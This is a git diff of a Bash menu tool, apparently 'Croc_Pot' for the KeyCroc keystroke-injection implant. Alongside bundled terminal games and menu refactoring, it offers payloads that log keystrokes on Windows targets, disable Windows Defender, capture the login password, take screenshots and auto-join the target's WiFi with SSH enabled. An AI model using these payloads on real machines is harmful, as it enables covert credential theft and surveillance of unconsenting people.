/etc/stunnel/pentmenu.conf; + touch /etc/stunnel/pentmenu.conf && chmod 777 /etc/stunnel/pentmenu.conf + echo "[PENTMENU-CLIENT]" >> /etc/stunnel/pentmenu.conf + echo "client=yes" >> /etc/stunnel/pentmenu.conf + echo "accept=$LHOST:$LPORT" >> /etc/stunnel/pentmenu.conf + echo "connect=$TARGET:$PORT" >> /etc/stunnel/pentmenu.conf + echo "verify=0" >> /etc/stunnel/pentmenu.conf + chmod 644 /etc/stunnel/pentmenu.conf + stunnel /etc/stunnel/pentmenu.conf && sleep 1 +#----if stunnel listener is already active we don't bother recreating it +else + echo -ne "${yellow}Looks like stunnel is already listening on port 9991, so not recreating${clear}\n" +fi +fi +} +mainmenu +} +## #----Recon scan menu ## -MenuTitle RECON SCAN MENU -MenuColor 1 TCPDUMP SCAN ; echo -ne " ${clear}\n" -MenuColor 2 NMAP SCAN ; echo -ne " ${clear}\n" -MenuColor 3 TRACEROUTE SCAN ; echo -ne " ${clear}\n" -MenuColor 4 WHOIS LOOKUP SCAN ; echo -ne " ${clear}\n" -MenuColor 5 DNS LOOKUP SCAN ; echo -ne " ${clear}\n" -MenuColor 6 PING TARGET SCAN ; echo -ne " ${clear}\n" -MenuColor 7 TARGET PORT SCAN ; echo -ne " ${clear}\n" -MenuColor 8 SSL/TLS SSLSCAN ; echo -ne " ${clear}\n" -MenuColor 9 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle RECON SCAN MENU ; MenuColor 20 1 TCPDUMP SCAN MENU ; MenuColor 20 2 NMAP SCAN MENU ; MenuColor 20 3 TRACEROUTE SCAN ; MenuColor 20 4 WHOIS LOOKUP SCAN ; MenuColor 20 5 DNS LOOKUP SCAN +MenuColor 20 6 PING TARGET SCAN ; MenuColor 20 7 TARGET PORT SCAN ; MenuColor 20 8 SSL/TLS SSLSCAN ; MenuColor 20 9 PHONE NUMBER LOOKUP ; MenuColor 19 10 DNS LEAK TEST +MenuColor 19 11 E-MAIL LEAK TEST ; MenuColor 19 12 PENTMENU RECON MENU ; MenuColor 18 13 RETURN TO MAIN MENU ; MenuEnd 23 case $m_a in - 1) tcpdump_scan ; croc_recon ;; - 2) nmap_menu ; croc_recon ;; - 3) traceroute_scan ; croc_recon ;; - 4) whois_scan ; croc_recon ;; - 5) dns_scan ; croc_recon ;; - 6) target_ping ; croc_recon ;; - 7) target_port ; croc_recon ;; - 8) ssl_scan ; croc_recon ;; - 9) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; croc_recon ;; + 1) tcpdump_scan ; tcpdump_scan ;; 2) nmap_menu ; croc_recon ;; 3) traceroute_scan ; croc_recon ;; 4) whois_scan ; croc_recon ;; 5) dns_scan ; croc_recon ;; 6) target_ping ; croc_recon ;; + 7) target_port ; croc_recon ;; 8) ssl_scan ; croc_recon ;; 9) phone_lookup ; croc_recon ;; 10) leak_dns ; croc_recon ;; + 11) email_leak ; croc_recon ;; 12) pentmenu ; pentmenu ;; 13) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; croc_recon ;; esac } ## #----Windows laptop keystorkes Function ## -keystorkes_laptop() { +function keystorkes_laptop() { echo -ne "\n${yellow}KeyCroc is pluged into OS${clear} --> ${OS_CHECK}\n" - echo -ne "$(Info_Screen '-With this payload you can log Keystorkes from windows laptop pc + echo -ne "$(Info_Screen ' +-With this payload you can log Keystorkes from windows laptop pc -May need to disenable windows defender for this to work -TO STOP THE PAYLOAD PRESS Ctrl + c -When stop this will open up notepad and save to loot/Croc_Pot')\n" @@ -791,9 +2080,10 @@ fi ## #----Windows Info Scan Function ## -windows_check() { +function windows_check() { clear - echo -ne "$(Info_Screen '-WINDOWS SCAN CAN TAKE UP TO 1 MIN TO RUN + echo -ne "$(Info_Screen ' +-WINDOWS SCAN CAN TAKE UP TO 1 MIN TO RUN -This is an Bash Bunny payload working on the Croc -This will Scan an Windows pc and collect alot of information -Save to loot/Croc_pot folder')\n" @@ -860,10 +2150,11 @@ cat ${LOOT_WIND} ## #----VPN SETUP-Start/stop Function ## -croc_vpn() { +function croc_vpn() { local vpn_file_A=/etc/openvpn/*.ovpn local vpn_file=/root/udisk/*.ovpn - echo -ne "$(Info_Screen '-First you will need to download the (filename.ovpn) file + echo -ne "$(Info_Screen ' +-First you will need to download the (filename.ovpn) file -From your VPN server of choice -Place it on the keycroc root of the udisk -Then select #1 VPN SETUP to do the rest @@ -881,7 +2172,7 @@ if [ -f ${vpn_file} ]; then find . -name *.ovpn -exec mv '{}' "/etc/openvpn/" ";" touch /etc/openvpn/credentials read_all ENTER YOUR USER NAME AND PRESS [ENTER] ; echo ${r_a} >> /etc/openvpn/credentials - read_all ENTER YOUR PASSWD AND PRESS [ENTER] ; echo ${r_a} >> /etc/openvpn/credentials + user_input_passwd /etc/openvpn/credentials VPN sed -i 's/auth-user-pass/auth-user-pass \/etc\/openvpn\/credentials/g' ${vpn_file_A} openvpn --config ${vpn_file_A} --daemon else @@ -891,34 +2182,19 @@ fi ## #----VPN Menu ## -MenuTitle VPN MENU -MenuColor 1 VPN SETUP ; echo -ne " ${clear}\n" -MenuColor 2 ENABLE VPN ; echo -ne " ${clear}\n" -MenuColor 3 DISABLE VPN ; echo -ne " ${clear}\n" -MenuColor 4 VPN STATUS ; echo -ne " ${clear}\n" -MenuColor 5 EDIT .OVPN FILE ; echo -ne " ${clear}\n" -MenuColor 6 REMOVE VPN FILES ; echo -ne " ${clear}\n" -MenuColor 7 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle VPN MENU ; MenuColor 19 1 VPN SETUP ; MenuColor 19 2 ENABLE VPN ; MenuColor 19 3 DISABLE VPN ; MenuColor 19 4 VPN STATUS ; MenuColor 19 5 EDIT .OVPN FILE ; MenuColor 19 6 REMOVE VPN FILES ; MenuColor 19 7 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) setup_vpn ; croc_vpn ;; - 2) openvpn --config ${vpn_file_A} --daemon ; echo -ne "\n$(ColorGreen 'ENABLE VPN CHECK VPN STATUS')\n" ; croc_vpn ;; - 3) killall openvpn ; service openvpn restart ; echo -ne "\n$(ColorRed 'DISABLE VPN CHECK VPN STATUS')\n" ; croc_vpn ;; - 4) route -n ; ifconfig ; ip route show ; systemctl status openvpn* ; croc_vpn ;; - 5) nano ${vpn_file_A} ; croc_vpn ;; - 6) rm -f ${vpn_file_A} /etc/openvpn/credentials ${vpn_file} ; echo -ne "\n$(ColorRed '.OVPN AND CREDENTIALS FILES HAS BEEN REMOVED')\n" ; croc_vpn ;; - 7) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; croc_vpn ;; + 1) setup_vpn ; croc_vpn ;; 2) openvpn --config ${vpn_file_A} --daemon ; echo -ne "\n$(ColorGreen 'ENABLE VPN CHECK VPN STATUS')\n" ; croc_vpn ;; 3) killall openvpn ; service openvpn restart ; echo -ne "\n$(ColorRed 'DISABLE VPN CHECK VPN STATUS')\n" ; croc_vpn ;; 4) route -n ; ifconfig ; ip route show ; systemctl status openvpn* ; croc_vpn ;; + 5) nano ${vpn_file_A} ; croc_vpn ;; 6) rm -f ${vpn_file_A} /etc/openvpn/credentials ${vpn_file} ; echo -ne "\n$(ColorRed '.OVPN AND CREDENTIALS FILES HAS BEEN REMOVED')\n" ; croc_vpn ;; 7) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; croc_vpn ;; esac } ## #----Croc Pot Plus Pass time ## -pass_time() { +function pass_time() { clear - echo -ne "$(Info_Screen '-I am not the developer of these scripts + echo -ne "$(Info_Screen ' +-I am not the developer of these scripts -Thought I would share them -Show the power of the keycroc and bash scripting')\n" ## @@ -933,49 +2209,49 @@ chess_game() { # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # Default values -strength=3 -namePlayerA="Player" -namePlayerB="AI" -color=true -colorPlayerA=4 -colorPlayerB=1 -colorHover=4 -colorHelper=true -colorFill=true -ascii=false -warnings=false -computer=-1 -mouse=true -guiconfig=false -cursor=true -sleep=2 -cache="" -cachecompress=false -unicodelabels=true -port=12433 +local strength=3 +local namePlayerA="Player" +local namePlayerB="AI" +local color=true +local colorPlayerA=4 +local colorPlayerB=1 +local colorHover=4 +local colorHelper=true +local colorFill=true +local ascii=false +local warnings=false +local computer=-1 +local mouse=true +local guiconfig=false +local cursor=true +local sleep=2 +local cache="" +local cachecompress=false +local unicodelabels=true +local port=12433 # internal values -timestamp=$( date +%s%N ) -fifopipeprefix="/tmp/chessbashpipe" -selectedX=-1 -selectedY=-1 -selectedNewX=-1 -selectedNewY=-1 -remote=0 -remoteip=127.0.0.1 -remotedelay=0.1 -remotekeyword="remote" -aikeyword="ai" -aiPlayerA="Marvin" -aiPlayerB="R2D2" -A=-1 -B=1 -originY=4 -originX=7 -hoverX=0 -hoverY=0 -hoverInit=false -labelX=-2 -labelY=9 +local timestamp=$( date +%s%N ) +local fifopipeprefix="/tmp/chessbashpipe" +local selectedX=-1 +local selectedY=-1 +local selectedNewX=-1 +local selectedNewY=-1 +local remote=0 +local remoteip=127.0.0.1 +local remotedelay=0.1 +local remotekeyword="remote" +local aikeyword="ai" +local aiPlayerA="Marvin" +local aiPlayerB="R2D2" +local A=-1 +local B=1 +local originY=4 +local originX=7 +local hoverX=0 +local hoverY=0 +local hoverInit=false +local labelX=-2 +local labelY=9 type stty >/dev/null 2>&1 && useStty=true || useStty=false # Choose unused color for hover while (( colorHover == colorPlayerA || colorHover == colorPlayerB )) ; do @@ -1058,7 +2334,7 @@ fi # $1 IP address to validate # Return 0 if valid, 1 otherwise function validIP() { -if [[ "$1" =~ ^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$ ]] ; then +if [[ "$1" =~ ${validate_ip} ]] ; then return 0 else return 1 @@ -2616,7 +3892,7 @@ done | $piper > "$fifopipe" } 3>&1 } ## -# - Pass time tetris +#----Pass time tetris ## tetris_game() { # Tetris game written in pure bash @@ -2643,55 +3919,55 @@ set -u # non initialized variable is an error trap '' SIGUSR1 SIGUSR2 # Those are commands sent to controller by key press processing code # In controller they are used as index to retrieve actual functuon from array -QUIT=0 -RIGHT=1 -LEFT=2 -ROTATE=3 -DOWN=4 -DROP=5 -TOGGLE_HELP=6 -TOGGLE_NEXT=7 -TOGGLE_COLOR=8 -DELAY=1 # initial delay between piece movements -DELAY_FACTOR=0.8 # this value controld delay decrease for each level up +local QUIT=0 +local RIGHT=1 +local LEFT=2 +local ROTATE=3 +local DOWN=4 +local DROP=5 +local TOGGLE_HELP=6 +local TOGGLE_NEXT=7 +local TOGGLE_COLOR=8 +local DELAY=1 # initial delay between piece movements +local DELAY_FACTOR=0.8 # this value controld delay decrease for each level up # color codes -RED=1 -GREEN=2 -YELLOW=3 -BLUE=4 -FUCHSIA=5 -CYAN=6 -WHITE=7 +local RED=1 +local GREEN=2 +local YELLOW=3 +local BLUE=4 +local FUCHSIA=5 +local CYAN=6 +local WHITE=7 # Location and size of playfield, color of border -PLAYFIELD_W=10 -PLAYFIELD_H=20 -PLAYFIELD_X=30 -PLAYFIELD_Y=1 -BORDER_COLOR=$YELLOW +local PLAYFIELD_W=10 +local PLAYFIELD_H=20 +local PLAYFIELD_X=30 +local PLAYFIELD_Y=1 +local BORDER_COLOR=$YELLOW # Location and color of score information -SCORE_X=1 -SCORE_Y=2 -SCORE_COLOR=$GREEN +local SCORE_X=1 +local SCORE_Y=2 +local SCORE_COLOR=$GREEN # Location and color of help information -HELP_X=58 -HELP_Y=1 -HELP_COLOR=$CYAN +local HELP_X=58 +local HELP_Y=1 +local HELP_COLOR=$CYAN # Next piece location -NEXT_X=14 -NEXT_Y=11 +local NEXT_X=14 +local NEXT_Y=11 # Location of "game over" in the end of the game -GAMEOVER_X=1 -GAMEOVER_Y=$((PLAYFIELD_H + 3)) +local GAMEOVER_X=1 +local GAMEOVER_Y=$((PLAYFIELD_H + 3)) # Intervals after which game level (and game speed) is increased -LEVEL_UP=20 -colors=($RED $GREEN $YELLOW $BLUE $FUCHSIA $CYAN $WHITE) -no_color=true # do we use color or not -showtime=true # controller runs while this flag is true -empty_cell=" ." # how we draw empty cell -filled_cell="[]" # how we draw filled cell -score=0 # score variable initialization -level=1 # level variable initialization -lines_completed=0 # completed lines counter initialization +local LEVEL_UP=20 +local colors=($RED $GREEN $YELLOW $BLUE $FUCHSIA $CYAN $WHITE) +local no_color=true # do we use color or not +local showtime=true # controller runs while this flag is true +local empty_cell=" ." # how we draw empty cell +local filled_cell="[]" # how we draw filled cell +local score=0 # score variable initialization +local level=1 # level variable initialization +local lines_completed=0 # completed lines counter initialization # screen_buffer is variable, that accumulates all screen changes # this variable is printed in controller once per game cycle puts() { @@ -3078,7 +4354,7 @@ show_cursor stty $stty_g # let's restore terminal state } ## -# - Pass time Snake +#----Pass time Snake ## snake_game() { ############################################################################## @@ -3088,32 +4364,32 @@ snake_game() { # Version: 1.01 (Wed Jan 9 20:04:26 CET 2013) # # # ############################################################################## -MW=$(tput cols) -MH=$(tput lines) -MH=$[MH-1] # bottom line is used for info and score -CONFIG=~/.housenka -DEFAULT_FOOD_NUMBER=2 # reset after game over in func. new_level -FOOD_NUMBER=0 -DEATH=0 -SCORE=0 -TIMING=0.1 # delay constant, lower value => faster moves -C=2 # game cycle +local MW=$(tput cols) +local MH=$(tput lines) +local MH=$[MH-1] # bottom line is used for info and score +local CONFIG=~/.housenka +local DEFAULT_FOOD_NUMBER=2 # reset after game over in func. new_level +local FOOD_NUMBER=0 +local DEATH=0 +local SCORE=0 +local TIMING=0.1 # delay constant, lower value => faster moves +local C=2 # game cycle declare -A FOOD -_STTY=$(stty -g) # Save current terminal setup +local _STTY=$(stty -g) # Save current terminal setup printf "\e[?25l" # Turn of cursor printf "\e]0;HOUSENKA\007" stty -echo -icanon -USER=$(whoami) -NAME=$(grep $USER /etc/passwd | cut -d : -f 5) +local USER=$(whoami) +local NAME=$(grep $USER /etc/passwd | cut -d : -f 5) ############# # ANSI data # ############# -GAME_OVER[0]="\e[1;35m╥┌ ╓─╖ ╥ ╥ ╥─┐ ╥─┐ ╥ ╥ ╥┐ ╥ ┬\e[0m" -GAME_OVER[1]="\e[0;31m╟┴┐ ║ ║ ║\║ ╟┤ ║ ╟─╢ ╟┴┐ ╨╥┘\e[0m" -GAME_OVER[2]="\e[1;31m╨ ┴ ╙─╜ ╨ ╨ ╨─┘ ╨─┘ ╨ ╨ ╨ ┴ ╨ \e[0m" -GAME_OVER[3]="\e[0;32m╥────────────────────────────────╥\e[0m" -GAME_OVER[4]="\e[1;32m║ Stiskni ENTER pro novou hru! ║\e[0m" -GAME_OVER[5]="\e[1;36m╨────────────────────────────────╨\e[0m" +local GAME_OVER[0]="\e[1;35m╥┌ ╓─╖ ╥ ╥ ╥─┐ ╥─┐ ╥ ╥ ╥┐ ╥ ┬\e[0m" +local GAME_OVER[1]="\e[0;31m╟┴┐ ║ ║ ║\║ ╟┤ ║ ╟─╢ ╟┴┐ ╨╥┘\e[0m" +local GAME_OVER[2]="\e[1;31m╨ ┴ ╙─╜ ╨ ╨ ╨─┘ ╨─┘ ╨ ╨ ╨ ┴ ╨ \e[0m" +local GAME_OVER[3]="\e[0;32m╥────────────────────────────────╥\e[0m" +local GAME_OVER[4]="\e[1;32m║ Stiskni ENTER pro novou hru! ║\e[0m" +local GAME_OVER[5]="\e[1;36m╨────────────────────────────────╨\e[0m" ############# # FUNCTIONS # ############# @@ -3306,11 +4582,11 @@ do done } ## -# - Pass time Matrix effect +#----Pass time Matrix effect ## function matrix_effect() { -N_LINE=$(( $(tput lines) - 1)); -N_COLUMN=$(tput cols); +local N_LINE=$(( $(tput lines) - 1)); +local N_COLUMN=$(tput cols); get_char() { RANDOM_U=$(echo $(( (RANDOM % 9) + 0))); RANDOM_D=$(echo $(( (RANDOM % 9) + 0))); @@ -3362,30 +4638,162 @@ matrix() { matrix ; } ## -# - Pass time Menu +#----Pass time Game of tic-tac-toe ## -MenuTitle PASS TIME GAMES -MenuColor 1 CHESS ; echo -ne " ${clear}\n" -MenuColor 2 TETRIS ; echo -ne " ${clear}\n" -MenuColor 3 SNAKE ; echo -ne " ${clear}\n" -MenuColor 4 MATRIX ; echo -ne " ${clear}\n" -MenuColor 5 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +tac_toe() { +cell_w=10 +# horizontal line +line_seg="---------" +line=" ""$line_seg""|""$line_seg""|""$line_seg" +local reset="\033[0m" +local player_1_str=$green"Human"$reset +local player_2_str=$blue"Computer"$reset +local positions=(- - - - - - - - -) # initial positions +local player_one=true # player switch init +local game_finished=false # is the game finished +local stall=false # stall - if an invalid or empty move was input +# functions that draws instructions and board based on positions arr +function draw_board() { + clear + name=$1[@] # passing an array as argument + positions=("${!name}") +# first lines - instructions + echo -e "\n Q W E _|_|_\n A S D → | | \n Z X C ‾|‾|‾\n\n" +for (( row_id=1; row_id<=3; row_id++ ));do +# row + row=" " + empty_row=" " +for (( col_id=1; col_id<$(($cell_w*3)); col_id++ ));do +# column +# every 10th is a separator +if [[ $(( $col_id%$cell_w )) == 0 ]]; then + row=$row"|" + empty_row=$empty_row"|" +else +if [[ $(( $col_id%5 )) == 0 ]]; then # get the center of the tile + x=$(($row_id-1)) + y=$((($col_id - 5) / 10)) +if [[ $x == 0 ]]; then + what=${positions[$y]} +elif [[ $x == 1 ]]; then + what=${positions[(($y+3))]} +else + what=${positions[(($y+6))]} +fi +# if it's "-", it's empty +if [[ $what == "-" ]]; then what=" "; fi + if [[ $what == "X" ]] ; then # append to row + row=$row$green$what$reset + else + row=$row$blue$what$reset + fi + empty_row=$empty_row" " # advance empty row +else # not the center - space + row=$row" " + empty_row=$empty_row" " + fi +fi +done + echo -e "$empty_row""\n""$row""\n""$empty_row" # row is three lines high +if [[ $row_id != 3 ]]; then + echo -e "$line" +fi +done + echo -e "\n" +} +# function that displays the prompt based on turn, reads the input and advances the game +function read_move() { + positions_str=$(printf "%s" "${positions[@]}") + test_position_str $positions_str # finish the game if all postiions have been taken or a player has won +if [ "$game_finished" = false ] ; then + if [ "$stall" = false ] ; then + if [ "$player_one" = true ] ; then + prompt="Your move, "$player_1_str"?" + fi + else + stall=false + fi +if [ "$player_one" = true ] ; then + echo -e $prompt + read -d'' -s -n1 input # read input + index=10 # init with nonexistent +case $input in + q) index=0;; + a) index=3;; + z) index=6;; + w) index=1;; + s) index=4;; + x) index=7;; + e) index=2;; + d) index=5;; + c) index=8;; +esac +if [ "${positions["$index"]}" == "-" ]; then + positions["$index"]="X" + player_one=false +else + stall=true # prevent player switch +fi + else +# computer, choose your position! + set_next_avail_pos_index "O" + player_one=true +fi + init_game # reinit, because positions persist +fi +} +function init_game() { + draw_board positions + read_move +} +function end_game() { + game_finished=true + draw_board positions +} +function test_position_str() { + rows=${1:0:3}" "${1:3:3}" "${1:6:8} + cols=${1:0:1}${1:3:1}${1:6:1}" "${1:1:1}${1:4:1}${1:7:1}" "${1:2:1}${1:5:1}${1:8:1} + diagonals=${1:0:1}${1:4:1}${1:8:1}" "${1:2:1}${1:4:1}${1:6:1} +if [[ $rows =~ [X]{3,} || $cols =~ [X]{3,} || $diagonals =~ [X]{3,} ]]; then + end_game + echo -e $player_1_str" wins! \n" + return +fi +if [[ $rows =~ [O]{3,} || $cols =~ [O]{3,} || $diagonals =~ [O]{3,} ]]; then + end_game + echo -e $player_2_str" wins! \n" + return +fi +if [[ ! $positions_str =~ [-] ]]; then + end_game + echo -e "End with a "$pink"draw"$reset"\n" +fi +} +# get next available position and set it to value of argument +function set_next_avail_pos_index() { + available=() + for (( i = 0; i < ${#positions[@]}; i++ )); do +if [[ ${positions[$i]} == '-' ]]; then + available+=($i) +fi +done +rand=$(jot -r 1 0 $(( ${#available[@]}-1 ))) # random in range 0 to available_len +positions[${available[$rand]}]=$1 +} +init_game +} +## +#----Pass time Menu +## +MenuTitle PASS TIME GAMES ; MenuColor 19 1 CHESS ; MenuColor 19 2 TETRIS ; MenuColor 19 3 SNAKE ; MenuColor 19 4 MATRIX ; MenuColor 19 5 TIC-TAC-TOE ; MenuColor 19 6 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) chess_game ; pass_time ;; - 2) tetris_game ; pass_time ;; - 3) snake_game ; pass_time ;; - 4) matrix_effect ; pass_time ;; - 5) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; pass_time ;; + 1) chess_game ; pass_time ;; 2) tetris_game ; pass_time ;; 3) snake_game ; pass_time ;; 4) matrix_effect ; pass_time ;; 5) tac_toe ; pass_time ;; 6) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; pass_time ;; esac } ## #----Windows defender ENABLE/DISABLE Function ## -windows_defender() { +function windows_defender() { clear ## #----Windows defender enable Function @@ -3447,18 +4855,9 @@ defender_disable() { #----Windows defender ENABLE/DISABLE Menu ## if [ "$(OS_CHECK)" = WINDOWS ]; then -MenuTitle WINDOWS DEFENDER -MenuColor 1 ENABLE WINDOWS DEFENDER ; echo -ne " ${clear}\n" -MenuColor 2 DISABLE WINDOWS DEFENDER ; echo -ne " ${clear}\n" -MenuColor 3 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle WINDOWS DEFENDER ; MenuColor 25 1 ENABLE WINDOWS DEFENDER ; MenuColor 25 2 DISABLE WINDOWS DEFENDER ; MenuColor 25 3 RETURN TO MAIN MENU ; MenuEnd 28 case $m_a in - 1) defender_enable ; croc_pot_plus ;; - 2) defender_disable ; croc_pot_plus ;; - 3) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; windows_defender ;; + 1) defender_enable ; croc_pot_plus ;; 2) defender_disable ; croc_pot_plus ;; 3) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; windows_defender ;; esac else echo -ne "\n\e[5m$(ColorRed '--The KeyCroc is not pluged into Windows pc This will not work on this OS')-->$(OS_CHECK)\n" @@ -3469,7 +4868,8 @@ fi ## function install_payloads() { clear - echo -ne "$(Info_Screen '-Select which Payload you would like to install')\n\n" + echo -ne "$(Info_Screen ' +-Select which Payload you would like to install')\n\n" ## #----Getonline Payload Function ## @@ -3478,7 +4878,8 @@ get_online_p() { local GETONLINE_WINDOWS=/root/udisk/payloads/Getonline_Windows.txt local GETONLINE_LINUX=/root/udisk/payloads/Getonline_Linux.txt local GETONLINE_RASPBERRY=/root/udisk/payloads/Getonline_Raspberry.txt - echo -ne "$(Info_Screen '-Payload Called GetOnline + echo -ne "$(Info_Screen ' +-Payload Called GetOnline -Connect automatically to target pc WIFI (Windows/Linux/Raspberry) -After install unplug and plug into target pc and type in below -getonline <-- MATCH word for windows @@ -3560,7 +4961,8 @@ fi ## croc_unlock_p() { clear - echo -ne "$(Info_Screen '-Start by pressing GUI + l this will bring you to login screen + echo -ne "$(Info_Screen ' +-Start by pressing GUI + l this will bring you to login screen -This will forus the user to enter password and save to tools/Croc_Pot -This will create another payload called Croc_unlock_2.txt -Next time at login screen type in crocunlock @@ -3598,25 +5000,27 @@ fi ## wifi_setup_p() { clear - echo -ne "$(Info_Screen '-WITH THIS PAYLOAD YOU CAN CREATE MULTIPLE WIFI SETTING + echo -ne "$(Info_Screen ' +-WITH THIS PAYLOAD YOU CAN CREATE MULTIPLE WIFI SETTING -THE PURPOSE OF THIS PAYLOAD IS THAT IF YOU MOVE YOUR KEYCROC -AROUND TO DIFFERENT WIFI ACCESS POINTS -YOU CAN CREATE A PAYLOAD WITH MATCH WORD -CONNECT TO WIFI ACCESS POINT QUICKLY -BY TYPING YOUR MATCH WORD')\n" -while read_all ENTER A NAME FOR THIS PAYLOAD AND PRESS [ENTER]; do - local PAYLOAD_FOLDER=/root/udisk/payloads/${r_a}.txt +while read_all ENTER A NAME FOR THIS PAYLOAD AND PRESS [ENTER] ; local namep=${r_a}; do + local PAYLOAD_FOLDER=/root/udisk/payloads/${namep}.txt if [ -e "${PAYLOAD_FOLDER}" ]; then echo -ne "\n${LINE_}\e[5m$(ColorRed 'THIS PAYLOAD ALREADY EXISTS PLEASE CHOOSE A DIFFERENT NAME')${LINE_}\n" else touch ${PAYLOAD_FOLDER} - echo -ne "$(ColorBlue 'ENTER THE MATCH WORD YOU WOULD LIKE TO USE AND PRESS [ENTER]'): "; read USER_MATCH - echo -ne "$(ColorBlue 'ENTER THE SSID AND PRESS [ENTER]'): "; read USER_SSID - echo -ne "$(ColorBlue 'ENTER THE PASSWORD AND PRESS [ENTER]'): "; read WIFI_PASS + read_all ENTER THE MATCH WORD YOU WOULD LIKE TO USE AND PRESS [ENTER] ; local USER_MATCH=${r_a} + read_all ENTER THE SSID AND PRESS [ENTER] ; local USER_SSID=${r_a} + read_all ENTER THE PASSWORD AND PRESS [ENTER] ; local WIFI_PASS=${r_a} echo -ne "# Title: WIFI-SETUP\n# Description: Setup your wifi with adding your ssid and passwd\n# Author: spywill\n# Version: 1.3\n# Category: Key Croc\n#\n#\n MATCH ${USER_MATCH}\nLED SETUP\n\$(sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID ${USER_SSID}\\\nWIFI_PASS ${WIFI_PASS}\\\nSSH ENABLE' /root/udisk/config.txt)\nsleep 1\nLED FINISH" >> ${PAYLOAD_FOLDER} echo -ne "\n${red}***${clear}$(ColorGreen 'WIFI_SET PAYLOAD IS NOW INSTALLED CHECK KEYCROC PAYLOADS FOLDER')${red}***${clear}\n -$(Info_Screen '--UNPLUG THE KEYCROC AND PLUG BACK IN +$(Info_Screen ' +--UNPLUG THE KEYCROC AND PLUG BACK IN --TYPE IN YOUR MATCH WORD LED WILL LIGHT UP GREEN --THEN UNPLUG THE KEYCROC AND PLUG BACK IN --YOUR KEYCROC SHOULD NOW BE CONNECTED TO YOUR WIFI SETUP\n')\n" @@ -3629,7 +5033,8 @@ done ## quick_croc_pot () { clear - echo -ne "\n$(Info_Screen '-Create payload + echo -ne "\n$(Info_Screen ' +-Create payload -Quickly Start Croc_Pot without OS detection -This is for when you Already ran OS detection on target pc by crocpot -Match word is qspot')\n\n" @@ -3661,15 +5066,16 @@ fi ## screen_shot() { clear - echo -ne "$(Info_Screen '-Option to install Croc_Shot.txt payload this will take screenshot of Target pc + echo -ne "$(Info_Screen ' +-Option to install Croc_Shot.txt payload this will take screenshot of Target pc -To start the Croc_Shot payload type in crocshot --This will save to loot/Croc_pot/screenshot +-This will save to loot/Croc_Pot/screenshot -Option to take screenshot now -For this to work properly run Croc_Pot_Payload.txt first to get OS detection')\n\n" -if [ -d /root/udisk/loot/Croc_pot/screenshot ]; then +if [ -d /root/udisk/loot/Croc_Pot/screenshot ]; then LED B else - mkdir /root/udisk/loot/Croc_pot/screenshot + mkdir /root/udisk/loot/Croc_Pot/screenshot fi ## #----Screen Croc_Shot Payload install @@ -3682,10 +5088,10 @@ else case $r_a in [yY] | [yY][eE][sS]) echo -ne "# Title: CrocShot\n# Description: Take screenshot of PC and save to loot/Croc_Pot/screenshot\n# Author: spywill\n# Version: 1.1\n# Category: Key Croc\n\nMATCH crocshot\n\n#---> Check for save passwd run CrocUnlock first if not edit below\nif [ -e 